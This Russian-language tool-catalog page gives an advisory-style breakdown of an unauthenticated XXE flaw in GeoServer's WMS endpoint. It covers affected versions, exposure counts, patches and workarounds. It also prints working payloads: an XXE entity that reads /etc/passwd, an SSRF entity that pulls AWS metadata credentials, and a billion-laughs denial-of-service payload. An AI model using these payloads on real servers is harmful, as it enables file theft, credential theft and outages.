Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
Инструменты/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔓 🛰️ 'CVE-2025-58360' WMS-эндпоинт GeoServer уязвим к XXE-атаке 🌟

GeoServer

🏷️ Основная информация

  • CVE ID: CVE-2025-58360
  • Опубликовано: 📅 25 ноября 2025
  • Последнее изменение: 📅 25 ноября 2025 (всё ещё актуально на 26 ноября)
  • Тип уязвимости: XML External Entity (XXE) – CWE-611
  • Затронутое ПО: GeoServer (геопространственный сервер с открытым исходным кодом, написанный на Java)
  • Серьёзность: 🔥 Высокая – базовая оценка CVSS v3.1 7.5
    • Вектор: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • Эксплуатация в дикой природе: 🟡 Пока не наблюдалась (26 ноября 2025) – но публичные PoC уже распространяются
  • Требуется аутентификация: ❌ Нет – полностью без аутентификации
  • Требуется взаимодействие с пользователем: ❌ Нет

🎨 Что делает эту ошибку особенной (и опасной)

Это классическая, но разрушительная XXE в эндпоинте GetMap службы Web Map Service (WMS).
Атакующие могут:

  • 📂 Читать любой файл, к которому имеет доступ процесс GeoServer (, , приватные ключи и т. д.)
Скачать инструмент
/etc/passwd
geoserver.xml
  • 🌐 Выполнять Server-Side Request Forgery (SSRF) для сканирования внутренних сетей или обращения к metadata-эндпоинтам (например, AWS/GCP)
  • 💣 Вызывать отказ в обслуживании (Denial-of-Service) с помощью атак с расширением сущностей («billion laughs»)
  • 🔗 Потенциально комбинировать с другими ошибками для получения полного RCE (не напрямую, но возможно при некорректной конфигурации)
  • 🛡️ Затронутые версии (подробная таблица)

    КомпонентУязвимые версииИсправлено вСтатус
    GeoServer Standalone2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.3, 2.25.6, 2.27.0🔴 Уязвим
    Docker (osgeo/geoserver)2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.27.0🔴 Уязвим
    Maven org.geoserver:gs-wms2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.25.6🔴 Уязвим
    Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.25.6🔴 Уязвим
    GeoServer 2.27.x и новее–Уже исправлено✅ Безопасно

    🌍 Глобальная подверженность (в реальном времени на 26 ноября 2025)

    ИсточникОткрытые экземплярыПримечания
    ZoomEye~49,400поиск app:"GeoServer"
    FOFA~24,000Результаты за последний год
    Shodan~31,000Порт 8080 + совпадение по заголовку
    GobySec~20,000Сканирование публичной сети

    → Это десятки тысяч потенциально уязвимых серверов, которые прямо сейчас находятся в открытом интернете! 🌐

    🧨 Полный технический разбор эксплуатации уязвимости

    Эндпоинт: POST /geoserver/wms
    Ключевой параметр: SLD_BODY (позволяет передавать необработанный XML-код стилей)
    Уязвимый участок кода: парсер XML не отключает разрешение внешних сущностей → классическая XXE.

    f77f64d7c92fd31b29d537f5205da524

    Пример 1 – Раскрытие файлов (/etc/passwd)

    root@kitploit:~
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
      <sld:UserLayer>
        <sld:LayerFeatureConstraints>
          <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
        </sld:LayerFeatureConstraints>
      </sld:UserLayer>
    </sld:StyledLayerDescriptor>
    

    → Ответ содержит содержимое /etc/passwd 🎉

    Пример 2 – SSRF к внутренним метаданным (пример AWS)

    root@kitploit:~
    <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
    

    → Приводит к утечке временных учётных данных AWS при работе на EC2.

    Пример 3 – DoS «billion laughs»

    root@kitploit:~
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
      <!-- repeat up to lol9 -->
    ]>
    <lol>&lol9;</lol>
    

    → За секунды расходует гигабайты оперативной памяти 💥

    🛠️ Официальные исправления и загрузки

    ВерсияДата выпускаСсылка для загрузки
    2.27.025 ноября 2025https://geoserver.org/release/stable/
    2.26.325 ноября 2025Исправление ветки сопровождения
    2.25.625 ноября 2025Более старая поддерживаемая ветка

    Пользователи Docker:

    root@kitploit:~
    docker pull osgeo/geoserver:2.27.0
    

    🔧 Обходные пути (если вы не можете сразу установить исправление)

    1. Блокируйте опасный XML с помощью правила WAF/mod_security:
      Отклоняйте запросы, содержащие <!ENTITY или SYSTEM "file://
    2. Отключите параметр SLD_BODY глобально (если он не нужен)
    3. Запустите GeoServer с файловой системой только для чтения + сбросьте capabilities
    4. Разместите за обратным прокси, который удаляет XML-тела запросов для неаутентифицированных пользователей

    📢 Официальные ссылки и PoC

    • Запись NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
    • Уведомление GeoServer: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
    • Тикет JIRA: https://osgeo-org.atlassian.net/browse/GEOS-11682
    • Публичный безопасный PoC (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
    • Шаблон Nuclei (автообнаружение): уже объединён в основную ветку

    ⏰ Хронология

    ДатаСобытие
    До ноября 2025Обнаружено автономно ИИ-сканером XBOW
    25 ноября 2025Скоординированное раскрытие → выпущены исправления
    25 ноября 2025CVE присвоен и опубликован
    26 ноября 2025PoC становятся вирусными, сканирование подверженности резко возрастает

    ✨ Заключение

    Это классическая XXE, поражающая широко развёрнутую геопространственную платформу с десятками тысяч экземпляров, доступных из интернета.
    Исправления вышли в тот же день, что и раскрытие, — огромный респект команде GeoServer за скорость! 🏆
    Но окно между выпуском исправления и массовой эксплуатацией стремительно сокращается.

    Если вы используете GeoServer → обновитесь сегодня.
    Не становитесь следующей новостью.

    Оставайтесь в безопасности, оставайтесь на высоте! 🛡️✨